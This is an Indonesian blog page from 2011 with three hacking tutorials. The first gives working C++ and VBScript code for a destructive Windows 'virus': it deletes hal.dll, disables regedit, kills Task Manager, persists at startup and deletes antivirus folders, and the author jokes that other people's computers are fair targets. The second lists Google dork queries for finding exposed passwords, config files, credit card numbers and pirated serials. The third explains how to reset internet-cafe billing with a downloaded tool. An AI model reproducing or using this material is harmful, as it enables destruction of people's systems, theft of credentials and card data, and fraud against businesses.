Virus sederhana tapi berbahaya

/ Minggu, 20 Maret 2011 /

Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus. semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak. Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan membahas cara gampang membuat virus pake vbs file.


Virus sederhana tapi berbahaya

1.virus ini dibuat pake c++,jadi siapkan tool c++ (ex:dev c portable n sejeniznya)
2.seterusnya copykan script ini Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; }
3.program/ato virus ini bakal ngapuz filoe c: jadi jangan di coba di ecsekusi sembarangan 4.Don't try this at your komputer(di komputer orang boleh).hehe
5.teknik yang lebih adavance lagi
6.copy paste lagi script di bawah ne, Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; }
7.perbdaan kode yg pertaman ini terlatak pada proses pencarian direktori system secara otomatis(jdi klo yg pertama klo mw ngapus file hal.dll,filenya haruz di c:,klo yg ini otomatis nyari)
8.med coba.. hahaha! sekali dor!! install ulang windows pun jadi. Hahaha

Lanjutan Virus 2
cara mudah bikin virus "versi 2"

Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools",
1, "REG_DWORD"
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs" misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32 dengan nama virus.vbs .getspecialfolder(0) digunakan untuk direktory WINDOWS .getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP .getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses. digunakan untuk membunuh proses (proses adalah program yang sedang berjalan) misalnya kita akan membunuh proses taskmanager On Error Resume Next CreateObject("WScript.Shell") .run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit On Error Resume Next CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsof \Windows\CurrentVersion\Run\virus" , "c:\windows\system32\virus.vbs" (menjalankan virus yang berada di direktory c:\windows\system32 dengan nama virus.vbs)

5.Menghapus File / Folder agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next set hapus = CreateObject("Scripting.FileSystemObject") hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\) hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)

6.Merestart Windows CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide mematikan windows dalam waktu 60 sekon :)yang beda cuman "shutdown -s-f -t 60" S = untuk shutdown dan R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu If day(now) = 1 and month(now) = 1 and year(now) = 2007 then '(masukkan kode virus disini) End if 'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1' dan tahun 2007

Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup. walaupun udah sering dibahas,, nggak papalah,,,, itung-itung buat nambahin pengetahuan kita. dan semoga bermanfaat



READ MORE - Virus sederhana tapi berbahaya

Google Hacking

/ /

Taking Advantage of Technology

Google merupakan satu dari beberapa perusahaan sangat besar didalam bidang bisnis internet. Selain menjadi satu dari beberapa perusahaan terbesar di dunia internet ini, google juga ternyata menjadi satu dari beberapa website yang dapat dikatakan memiliki jumlah catatan pengunjung terbanyak, bagaimana tidak? Segala sesuatu yang sehubungan dengan internet sekarang ini semuannya dapat dicari melalui google, dari data mengenai masalah umum, berita, hingga informasi teknis.


Berbicara sehubungan dengan sub judul artikel ini, yang berbunyi “Taking Advantage of Technology”, dalam artikel kali ini saya akan sedikit membahas mengenai sebuah tehnik hacking yang menggunakan layanan yang diberikan daripada google ini sendiri.

Seperti yang telah kita ketahui, bahwa dengan adanya kemajuan teknologi dan semakin berkembangnya industri internet, tentu juga banyak hal hal lain yang terjadi sehubungan dengan system keamanan. Majunya sebuah jenis teknologi, tentu akan diimbangi dengan tehnik “men-dobrak” daripada system itu sendiri. Ini dapat kita lihat dalam kasus google.com sebab telah diketahui bahwa selain berguna sebagai sebuah search engine paling ampuh dengan database yang mencapai miliaran jumlahnya, google pun tidak dapat menutupi kenyataan bahwa banyak hacker yang menggunakan google.com sebagai sarana melakukan tindak “iseng-iseng” di internet, sebab selain dapat mencari data data seperti MP3, Film, Artikel, dan lain sebagainyam google pun memiliki kemampuan untuk dapat mencari data yang dapat digolongkan sebagai data rahasia.

Dengan menggunakan sedikit kemampuan unik, dan tentunya dengan menggunakan google.com sebagai sarana pencarian data, ternyata orang dapat menemukan banyak data sensitive di Internet. Data data yang dimaksud dengan data sensitive adalah data yang dapat digolongkan sebagai data pribadi, seperti nomor kartu kredit, dan password.

Menggunakan google tentunya sudah bukanlah merupakan sebuah hal yang aneh lagi bagi mereka yang sering menggunakan internet. Ditambah lagi, mengingat penggunaan daripada website google.com itu sendiri yang sangat user-friendly, penulis merasa tidak perlu untuk menjelaskan lebih lanjut mengenai metode mencari dengan menggunakan google. Dalam artikel ini kita akan membahas lebih kearah dasar metode pencarian serta pengenalan string dalam penggunaannya di google.com serta contoh contoh bentuk kalimat pencarian yang sangat membantu dalam melakukan google hacking nantinya.

Tehnik Dasar Pencarian
• Penggunaan string (+) digunakan untuk melakukan pencarian paksa terhadap huruf yang serupa. Sedangkan (-) digunakan untuk men-tidak sertakan sebuah kata dalam pencarian.
• Untuk mencari sebuah susunan kata tertentu dengan sangat tepat, maka anda perlu menggunakan string (“ “)
• Sedangkan titik (.) digunakan untuk melakukan metode pencarian text satu karakter.
• Tanda bintang melambangkan segala huruf.
• Syntax site: digunakan untuk memerintahkan google supaya melakukan pencarian dalam situs tertentu saja. Alamat situsnya dapat dimasukan sesudah tanda titik dua. (e.g site:www.th0r.name)
• Syntax filetype: digunakan untuk memerintahkan google untuk melakukan pencarian terhadap jenis file secara ter-spesifikasi. Jenis file yang ingin dicari dapat diposisikan setelah tanda titik dua.
• Syntax link: digunakan untuk memerintahkan google supaya hanya melakukan pencarian dalam hyperlinks tertentu.
• Syntax cache: digunakan untuk memerintahkan google untuk menampilkan versi daripada sebuah webpage pada saat google membukanya. Keterangan mengenai alamat website dapat ditambahkan pada bagian akhir sesudah tanda titik dua.
• Syntax intitle: dalam hal ini google diperintahkan hanya untuk mencari keterangan berdasarkan title daripada dokumen dokumen tertentu, sesuai dengan yang kita ketikan pada bagian akhir syntax setelah tanda titik dua.
• Syntax inurl: Google akan melakukan pencarian data dalam syntax URL tertentu yang diberikan setelah tanda titik dua.

Mengenal lebih dalam Syntax Untuk Google Hacking
Setelah mengenal dasar metode pencarian menggunakan google.com, sekarang kita akan beralih ke syntax yang dapat dikatakan lebih specific dan lebih komplikasi dibandingkan syntax yang telah diberikan diatas. Mari sekarang kita perhatikan syntax dibawah ini:

intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurlasslist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Contoh contoh yang diberikan diatas adalah contoh contoh syntax yang bias dikatakan digunakan untuk mencari password ataupun admin page, dan juga bias digunakan untuk mencari page yang tidak seharusnya dapat dibuka oleh user biasa. Kombinasi kombinasi lain dapat digunakan untuk melakukan pencarian yang lain dan hanya perlu dimodifikasi sesuai dengan kebutuhan dan target anda.
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
Sedangkan syntax yang diatas ini digunakan untuk mencari nomor kartu kredit orang menggunakan google.com
Bedah Syntax
Setelah melihat beberapa syntax yang lebih complex diatas, mari kita sedikit membahas maksud dari syntax syntax yang ada dibawah ini.
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Seperti yang dapat kalian perhatikan dari keseluruhan syntax. Bagian yang diganti hanya selalu pada bagian sesudah kata “Parent Directory”. Kenapa? Setelah kita pelajari dibagian awal artikel ini tadi bahwa syntax (“ “) digunakan untuk melakukan pencarian kalimat secara pasti, dan (-) digunakan untuk men-tidak ikut sertakan sebuah kata dalam keseluruhan kalimat pencarian. Sehingga dalam syntax ini dapat kita artikan secara kasar juga sebagai berikut:
• Pencari sedang melakukan “Parent Directory” Parent Directory secara pastipencarian untuk kata dan tidak secara terpencar (Parent sendiri dan Directory sendiri)
• Pencari menaruh apa yang ingin dia cari. (Contoh : /appz/ adalah aplikasi. Dan MP3, berarti dia mencari mengenai hal MP3)
-xxx• Pencari tidak menginginkan adanya konten xxx dalam pencariannya.
-html• Pencari tidak menginginkan adanya konten html dalam pencariannya.
-htm• Pencari tidak menginginkan adanya konten htm dalam pencariannya.
-php• Pencari tidak menginginkan adanya konten php dalam pencariannya.
• Dan lain sebagainya.
List Syntax, serta Kombinasinya
Setelah membahas mengenai metode pencarian, syntax yang cukup komplikasi hingga beda arti syntax, pada bagian sebelumnya. Pada bagian ini kita akan membahas mengenai kombinasi syntax dan bagaimana fungsinya, serta bagaimana membaca arti syntax tersebut.
Inurl:Microsoft filetype:iso
Anda akan mencari pada setiap URL berbau kata Microsoft untuk segala file yang bertipe iso. Anda dapat merubah URL dan Filetype menjadi apapun sesuai kebutuhan anda.
“# -FrontPage-” inurl:service.pwd
Dengan menggunakan syntax ini, anda menyuruh google untuk mencarikan password frontpage untuk anda.
“http://*:*@www”
Syntax diatas digunakan untuk melakukan pencarian password pada line url anda. Dalam kasus ini anda mencari user dan password yang tulisannya apa saja, pada domain name tertentu. (Masukan nama domain tanpa .com .net / .org) – (Contoh : “http://*:*@www” neotek)
Cara lain untuk menggunakan syntax ini dalam bentuk yang berkesebalikan ialah dengan cara menuliskan syntax seperti ini:
“http://th0r:th0r@www” password th0r pada websitedalam kasus ini anda mencari username dan yang nantinya akan anda masukan alamatnya dibagian belakang.
“sets mode +k”
Nampak seperti IRC? Memang betul. Ada banyak juga room di IRC yang menggunakan key untuk melakukan join kedalam room tersebut dan dengan menggunakan syntax ini, anda akan dapat menemukan beberapa key yang tercatat dalam log percakapan channel / room tersebut.
Allinrul: Admin mdb
Kalian akan menemukan banyak web page sehubungan dengan administrator system page.
Intitle: “Index Of” config.php
Dengan syntax diatas, kalian akan diberikan setumpuk data mengenai website website yang memiliki file config.php
Bahkan google dapat juga dijadikan ajang untuk mencari warez serial code. Katakanlah anda membutukan Windows XP Pro serial number. Anda hanya perlu membuka [You must be registered and logged in to see this link.] dan mengetikan syntax sebagai berikut:
“Windows XP Professional” 94FBR
Yang dapat juga kita artikan sebagai pencarian kata Windows XP Professional tanpa di pisahkan. Sedangkan 94FBR itu sendiri adalah sebuah code yang kerapkali dimasukan ke dalam bagian daripada registration code yang ada pada kebanyakan software Microsoft. Oleh dari karena hal tersebut, penggunaan code 94FBR mungkin akan cukup membantu dalam melakukan pencarian serial code. Akan tetapi, segalanya tetap dapat dimodifikasi sesuai dengan keinginan serta keperluan anda.
Sekian cerita singkat saya kali ini mengenai Google Hacking. Perlu diingat bahwa bagaimana tingkat kesuksesan dalam menggunakan google hacking ini adalah 100% tergantung daripada ide dan kreatifitas anda sendiri dalam mengkombinasikan syntax dan menyesuaikan data yang anda ketahui mengenai suatu target tertentu. Tapi yang perlu saya jelaskan disini, bahwa google hacking adalah salah satu tehnik yang cukup mengerikan apabila anda dapat menggunakannya dengan sangat baik. Hal inipun didukung dengan kenyataan bahwa kebanyakan ahli security di dunia telah menempatkan Google Hacking sebagai salah satu tehnik yang sejajar dan sama berbahayanya dengan SQL Injection, Cross-site Scripting dan Remote Execution Command.
Credit and Special Thanks To: Johnny Long With His Book Named as “Google Hacking”
Akhir kata, saya hanya ingin mengucapkan. Teknologi berkembang untuk di eksploitasi fungsi dan manfaatnya. Kalau meng-eksploitasi kekayaan alam itu salah, meng-eksploitasi funsi teknologi adalah sebuah hal dapat dikatakan bagus. Oleh dari karena itu, teruslah mencari keuntungan daripada penggunaan system itu sendiri.
Salam,

READ MORE - Google Hacking

cara mudah hack billing warnet

/ /

Saya ingin berbagi kesobat-sobat nih, tentang dunia Hacking. Kali ini saya punya software yang ampuh untuk ngeHack Billing warnet. teknik ini sangat mudah kok... cekidooottt :)


Peringatan !! sebelum lanjut saya ingin memberitaukan bahwa Teknik hacking billing warnet ini sebagai pembelajaran saja, terutama para warnet agar lebih waspada. Untuk itu apabila terjadi sesuatu di luar tanggu jawab. Ok sudah setuju, mari lanjut.

Tool yang akan digunakan adalah salah satu dari sekian banyak tool hack billing warnet. Masing-masing tool memiliki metode yang berbeda-beda. Tool yang ini menggunakan metode yang mampu mereset biaya online anda pada billing warnet menjadi nol. Download toolnya disini.

Ok kita mulai saja, Ikuti langkah-langkahnya :

1. Lakukan Login pada Billing Seperti halnya anda biasa di warnet.
2.
Jalankan tool yang sudah anda download, nanti pas anda klik muncul dua pilihan. yaitu All Client dan Single Client.

Belajar Hacking kita mulai :

Single Client : Yaitu Hanya untuk PC yang kita pakai saja.

All Client : yaitu Untuk Semua PC.

Setelah anda pilih salah satu, Lalu pada Server IP/Name ganti tulisan localhost dengan IP server (IP PC servernya). Atau IP server pada waktu anda di warnet (Contoh) Terus Pada Port biarkan apa adanya, tidak usah diganti. Langsung Pilih Connect.

Nah.., setelah anda pilih Connect, lalu masukkan No Computer yang akan anda Hack dan klik HACK NOW !!!

Hasilnya bisa lihat sendiri, Secara otomatis waktu dalam billing menjadi 0 dengan biaya awal. Hebatkan !!

Keterangan Hack:

untuk mengetahui IP addrres servernya anda bisa lakukan dengan cara me-restart PC tersebut dan ketika pertama kali muncul biling, lihat pada kota kecil di atas terdapat tulisan ||| wait ***.***.**.*** ||| Nah kalau muncul seperti ini (123.456.78.910) adalah IP servernya.

Saran bagi pemilik warnet update selalu aplikasi keamanan Billing anda, Agar terhindar dari hal-hal seperti ini. cukup sampe disini belajar Hacking’nya. Kalau masih ada yang belum mengerti, komentar aja di bawah.



READ MORE - cara mudah hack billing warnet

Followers

 
Copyright © 2010 keep in touch, All rights reserved
Design by DZignine. Powered by Blogger